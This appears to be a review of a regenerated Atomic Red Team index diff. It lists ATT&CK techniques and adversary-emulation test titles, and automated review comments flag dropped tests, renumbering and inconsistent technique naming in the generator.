- T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.001 Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md)
- Atomic Test #1: Skeleton Key via Mimikatz [windows]
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.006 HTML Smuggling](../../T1027.006/T1027.006.md)
- Atomic Test #1: HTML Smuggling Remote Payload [windows]
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
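Review bot: `T1556.001` loses `Atomic Test #1: Skeleton Key via Mimikatz` and is rendered as `CONTRIBUTE A TEST` under the shortened name `Domain Controller Authentication`. The identical change recurs in every tactic section where T1556.001 appears in this diff, so it is one bug in the technique/test lookup surfacing several times; fix it once in the generator rather than touching the generated files, and regenerate.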
@@ -877,9 +875,7 @@
- [T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.018 Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md)
- Atomic Test #1: Python Startup Hook - atomic_hook.pth (Windows) [windows]
- Atomic Test #2: Python Startup Hook - usercustomize.py (Windows) [windows]
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.010 Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md)
- Atomic Test #1: Install AppInit Shim [windows]
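Review bot: `T1546.018 Event Triggered Execution: Python Startup Hooks` drops both Windows tests (`atomic_hook.pth`, `usercustomize.py`) and falls back to `CONTRIBUTE A TEST`, while the neighbouring T1574.009 and T1546.010 entries are unchanged. The identical hunk appears again further down for the same technique under another tactic, so the regression is deterministic; check how the port's test discovery treats this technique's files specifically.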
@@ -1110,15 +1106,11 @@
- Atomic Test #2: Modify Terminal Services DLL Path [windows]
- [T1176 Browser Extensions](../../T1176/T1176.md)
- Atomic Test #1: Chrome/Chromium (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Firefox [linux, windows, macos]
- Atomic Test #3: Edge Chromium Addon - VPN [windows, macos]
- Atomic Test #4: Google Chrome Load Unpacked Extension With Command Line [windows]
- [T1137.005 Office Application Startup: Outlook Rules](../../T1137.005/T1137.005.md)
- Atomic Test #1: Outlook Rule - Subject Trigger with DeletePermanently Action via COM Object [windows]
- Atomic Test #2: Outlook Rule - Sender Address Trigger with DeletePermanently Action via COM Object [windows]
- Atomic Test #3: Outlook Rule - Auto-Forward Emails to External Address via COM Object [windows]
- Atomic Test #4: Outlook Rules - Enumerate Existing Rules via PowerShell COM Object [windows]
- Atomic Test #5: Outlook Rule - Create Rule with Obfuscated Blank Name (MAPI Evasion) [windows]
- Atomic Test #2: Chrome/Chromium (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
- Atomic Test #5: Google Chrome Load Unpacked Extension With Command Line [windows]
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098.007 Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.011 Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md)
- Atomic Test #1: Application Shim Installation [windows]
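Review bot: two unrelated changes are mixed into this hunk. First, T1176 gains `Atomic Test #2: Chrome/Chromium (Chrome Web Store)` and shifts the existing Firefox, Edge and unpacked-extension tests from #2-#4 to #3-#5, a renumbering that breaks any reference to those test numbers; if the Chrome Web Store test is new it should be appended rather than inserted mid-sequence. Second, all five T1137.005 Outlook Rules tests (subject and sender triggers, auto-forward, rule enumeration, blank-name MAPI evasion) vanish into `CONTRIBUTE A TEST`, which is a coverage regression for a technique defenders rely on to validate mailbox-rule detections. Please split these into separate commits and confirm each is intended.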
@@ -1346,9 +1338,7 @@
- [T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.018 Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md)
- Atomic Test #1: Python Startup Hook - atomic_hook.pth (Windows) [windows]
- Atomic Test #2: Python Startup Hook - usercustomize.py (Windows) [windows]
- T1546.018 Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1197 BITS Jobs](../../T1197/T1197.md)
- Atomic Test #1: Bitsadmin Download (cmd) [windows]
@@ -1360,8 +1350,7 @@
- [T1546.002 Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md)
- Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
- T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.001 Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md)
- Atomic Test #1: Skeleton Key via Mimikatz [windows]
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1668 Exclusive Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1394,7 +1383,7 @@
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1132.001 Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md)
- Atomic Test #3: XOR Encoded data. [windows]
- T1568.002 Dynamic Resolution: Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1071.004 Application Layer Protocol: DNS](../../T1071.004/T1071.004.md)
- Atomic Test #1: DNS Large Query Volume [windows]
- Atomic Test #2: DNS Regular Beaconing [windows]
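Review bot: `T1568.002 Dynamic Resolution: Domain Generation Algorithms` is shortened to `Domain Generation Algorithms` while `T1132.001 Data Encoding: Standard Encoding` and `T1071.004 Application Layer Protocol: DNS` on either side keep their parent prefix. The shortened form is also what the matrix tables at the end of this diff now show, so whichever convention is chosen should be implemented in one code path shared by the list and table renderers.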
@@ -1421,8 +1410,7 @@
- Atomic Test #13: Splashtop Execution [windows]
- Atomic Test #14: Splashtop Streamer Execution [windows]
- Atomic Test #15: Microsoft App Quick Assist Execution [windows]
- [T1659 Content Injection](../../T1659/T1659.md)
- Atomic Test #2: MITM Proxy Injection (Windows) [windows]
- T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1572 Protocol Tunneling](../../T1572/T1572.md)
- Atomic Test #1: DNS over HTTPS Large Query Volume [windows]
@@ -1517,7 +1505,6 @@
- Atomic Test #7: Windows Screencapture [windows]
- Atomic Test #8: Windows Screen Capture (CopyFromScreen) [windows]
- Atomic Test #9: Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted [windows]
- Atomic Test #10: RDP Bitmap Cache Extraction via bmc-tools [windows]
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #1: Input Capture [windows]
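Review bot: `Atomic Test #10: RDP Bitmap Cache Extraction via bmc-tools` is dropped from the screen-capture test list with no replacement. As with the other dropped entries in this diff it is the highest-numbered test in its technique that disappears, so please check whether the port truncates or mis-parses the tail of longer test lists.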
@@ -1774,8 +1761,7 @@
- [T1555.004 Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md)
- Atomic Test #1: Access Saved Credentials via VaultCmd [windows]
- Atomic Test #2: WinPwn - Loot local Credentials - Invoke-WCMDump [windows]
- [T1556.001 Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md)
- Atomic Test #1: Skeleton Key via Mimikatz [windows]
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1003.003 OS Credential Dumping: NTDS](../../T1003.003/T1003.003.md)
@@ -1788,8 +1774,6 @@
- Atomic Test #7: Create Volume Shadow Copy with Powershell [windows]
- Atomic Test #8: Create Symlink to Volume Shadow Copy [windows]
- Atomic Test #9: Create Volume Shadow Copy with diskshadow [windows]
- Atomic Test #10: Copy NTDS in low level NTFS acquisition via MFT parsing [windows]
- Atomic Test #11: Copy NTDS in low level NTFS acquisition via fsutil [windows]
- [T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting](../../T1558.003/T1558.003.md)
- Atomic Test #1: Request for service tickets [windows]
- Atomic Test #2: Rubeus kerberoast [windows]
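Review bot: the two low-level NTDS acquisition tests (#10 `via MFT parsing` and #11 `via fsutil`) disappear from T1003.003 and the hunk shrinks by two lines. These are the tests that exercise detection of NTDS theft bypassing the normal file APIs, so losing them from the index under-reports credential-access coverage. The surviving entries (#7-#9) are the lower-numbered ones, consistent with the tail-of-list loss seen elsewhere in this diff.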
@@ -1877,8 +1861,6 @@
- Atomic Test #1: System Service Discovery [windows]
- Atomic Test #2: System Service Discovery - net.exe [windows]
- Atomic Test #4: Get-Service Execution [windows]
- Atomic Test #6: System Service Discovery - Windows Scheduled Tasks (schtasks) [windows]
- Atomic Test #7: System Service Discovery - Services Registry Enumeration [windows]
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #4: Packet Capture Windows Command Prompt [windows]
- Atomic Test #5: Windows Internal Packet Capture [windows]
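Review bot: System Service Discovery loses `Atomic Test #6: ... Windows Scheduled Tasks (schtasks)` and `Atomic Test #7: ... Services Registry Enumeration` while #1, #2 and #4 survive. Same pattern as the other shrinking hunks: the highest-numbered tests are dropped, which again suggests the port stops reading a technique's test list early rather than a deliberate removal.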
@@ -1972,8 +1954,7 @@
- [T1049 System Network Connections Discovery](../../T1049/T1049.md)
- Atomic Test #1: System Network Connections Discovery [windows]
- Atomic Test #2: System Network Connections Discovery with PowerShell [windows]
- Atomic Test #3: System Network Connections Discovery via PowerShell (Process Mapping) [windows]
- Atomic Test #7: System Discovery using SharpView [windows]
- Atomic Test #4: System Discovery using SharpView [windows]
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1654 Log Enumeration](../../T1654/T1654.md)
- Atomic Test #1: Get-EventLog To Enumerate Windows Security Log [windows]
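Review bot: in T1049, test #3 (`via PowerShell (Process Mapping)`) is removed and `System Discovery using SharpView` is renumbered from #7 to #4. The old listing kept #7 even though #4-#6 were absent from this Windows-only view, i.e. numbers came from the position in the technique's full test list; the new #4 cannot be derived from the visible entries, so either the test ordering in the source changed or the port computes numbers differently. The number is a canonical identifier and should be preserved.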
@@ -2104,8 +2085,7 @@
- Atomic Test #10: Akira Ransomware drop Files with .akira Extension and Ransomnote [windows]
- T1667 Email Bombing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1496 Resource Hijacking](../../T1496/T1496.md)
- Atomic Test #2: Windows - Simulate CPU Load with PowerShell [windows]
- T1496 Resource Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1485 Data Destruction](../../T1485/T1485.md)
- Atomic Test #1: Windows - Overwrite file with SysInternals SDelete [windows]
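Review bot: `T1496 Resource Hijacking` loses `Atomic Test #2: Windows - Simulate CPU Load with PowerShell` and is rendered as `CONTRIBUTE A TEST`, while T1485 directly below keeps its tests. Same linked-to-placeholder flip as elsewhere in this diff; verify the test YAML still exists before accepting the regenerated index.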
@@ -2125,7 +2105,6 @@
- Atomic Test #9: Disable System Restore Through Registry [windows]
- Atomic Test #10: Windows - vssadmin Resize Shadowstorage Volume [windows]
- Atomic Test #11: Modify VSS Service Permissions [windows]
- Atomic Test #13: Windows - Delete Volume Shadow Copies via Diskshadow [windows]
- T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
- Atomic Test #1: Shutdown System - Windows [windows]
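Review bot: `Atomic Test #13: Windows - Delete Volume Shadow Copies via Diskshadow` is removed from the Inhibit System Recovery list with nothing in its place (#12 is already absent from the context, so this was the last entry). Losing the diskshadow variant means the index no longer advertises coverage for a shadow-copy deletion path that vssadmin-centric detections commonly miss; confirm the removal is intended.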
@@ -2150,8 +2129,7 @@
- [T1195 Supply Chain Compromise](../../T1195/T1195.md)
- Atomic Test #1: Octopus Scanner Malware Open Source Supply Chain [windows]
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1659 Content Injection](../../T1659/T1659.md)
- Atomic Test #2: MITM Proxy Injection (Windows) [windows]
- T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
- Atomic Test #2: Activate Guest Account [windows]
+1 -1
@@ -2,7 +2,7 @@
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job: Cron [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerading: Match Legitimate Name or Location [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Network Configuration Discovery: Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services: SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Staged: Local Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encoding: Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ESXi Administration Command [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job: Cron [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job: Cron [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery: Local Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Webhook [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution: Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ESXi Administration Command [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job: Cron [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job: Cron [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery: Local Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Webhook [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Indicator Removal on Host: Clear Command History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Information Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Credential Stuffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Virtual Machine Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Access Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: Bash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create Account: Local Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | System Network Configuration Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
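Review bot: the only cell that changes in this matrix row is `Dynamic Resolution: Domain Generation Algorithms` becoming `Domain Generation Algorithms`, while every other sub-technique in the same row (`Brute Force: Password Spraying`, `Account Discovery: Local Account`, `Scheduled Task/Job: Cron`) keeps its parent prefix. This is the table-renderer side of the naming inconsistency already present in the per-technique lists; apply the chosen convention uniformly.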
+7 -7
@@ -3,14 +3,14 @@
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | Remote Services:VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [System Network Configuration Discovery: Internet Connection Discovery](../../T1016.001/T1016.001.md) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Exfiltration Over Webhook [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing: Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services: SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Dynamic Resolution: Domain Generation Algorithms](../../T1568.002/T1568.002.md) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | [Device Driver Discovery](../../T1652/T1652.md) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing: Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Services: SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
